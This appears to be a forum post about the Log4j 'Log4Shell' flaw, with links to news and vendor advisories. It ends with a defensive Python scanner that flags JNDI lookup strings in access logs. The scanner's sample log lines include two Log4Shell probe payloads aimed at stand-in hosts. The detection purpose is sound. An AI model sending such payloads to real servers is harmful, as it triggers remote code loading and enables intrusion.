First, for non-IT people, a mainstream article ...
New cyber vulnerability poses 'severe risk,' DHS says
The vulnerability is linked to a commonly used piece of software called Log4j, a utility that runs in the background of many commonly used software applications.
abcnews.go.com
Now, for us Dungeon IT Geeks (don't get me that 'professional'), this is not good ...
Someone else even claims a Black Hat talk from 2016 identified this issue, which wouldn't surprise me.
Maybe I'm missing something, but I don't know why log4j's devs seemed to think it was wise to pull and execute any plugin -- essentially any arbitrary code -- from any LDAP store (and seemingly DNS, along with one other protocol) ... and, most of all, enable it by default. The latter was just ... well ... chronically stupid. How this escaped all the eyes of open source for over 5 years -- although maybe it didn't, if the Black Hat talk comment is true -- is beyond me.
I'm not an anti-Java guy, but as a colleague I greatly respect put it oh-so-well ... "Java is the new COBOL." I've never liked 'stack machines' (I won't go further into my EE bigotry against CS), and we've reached that point. Rust the Internet. Even Linus sees value.
I'll quote Tenable (e.g., Nessus) on issues related to the Proof-of-Concept (PoC) log4shell and other known information as of Fri 12/10.
CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
Critical vulnerability in the popular logging library, Log4j 2, impacts a number of services and applications, including Minecraft, Steam and Apple iCloud. Attackers have begun actively scanning for and attempting to exploit the flaw.
www.tenable.com
Assuming the prior PoC from March isn't the same (although it looks similar enough), the attacks have been in the wild since 9 days before disclosure. But given how much of a massive oversight this is, and how much LDAP store lookups are used for almost everything -- including to Active Directory (it's also LDAPv3 based, although it's had similar RFC exploits, but nothing so generic as this across Java/non-Windows) -- this is really bad.
Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
Update History (Date / Description of Updates): Dec. 20, 2021: Additional coverage and IOCs; additional detection capabilities for customers via Cisco Global Threat Alerts. Dec. 18, 2021: Additional mitigation guidance; updated coverage information. Dec. 17, 2021: Added additional vulnerability and...
blog.talosintelligence.com
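The post above says the attacks were already in the wild before disclosure, so the first thing a defender wants is to know whether their own logs carry the lookup string that triggers the LDAP/DNS fetch. Below is an added example (not from the post or from any of the linked vendors) of a small log scanner for that pattern; the log lines and host names in it are constructed for illustration.

```python
import re
from typing import Iterable, List, NamedTuple

# Log4j 2 (before the fix) resolves "${jndi:<scheme>://host/...}" inside a
# logged message and fetches the named object over LDAP, RMI or DNS, which is
# the lookup the post describes. A web server that logs request headers will
# therefore have the probe string sitting in its access log. This regex matches
# the plain form of that lookup, case-insensitively, for the schemes involved.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:",
    re.IGNORECASE,
)


class Hit(NamedTuple):
    line_no: int   # 1-based position in the scanned input
    scheme: str    # protocol the lookup asked for, lower-cased
    line: str      # the offending log line


def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Return every line carrying a JNDI lookup string, with the scheme used."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_LOOKUP.search(line)
        if m:
            hits.append(Hit(n, m.group("scheme").lower(), line.rstrip("\n")))
    return hits


# Constructed sample access-log lines (not real traffic). The first two are
# benign; the third and fourth carry the lookup in the User-Agent field.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:DNS://probe.example/x}"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: jndi lookup via {hit.scheme}: {hit.line}")
```

A match only shows that someone sent the string, not that the lookup succeeded; it tells you which hosts and time windows to investigate, and the actual fix remains upgrading Log4j.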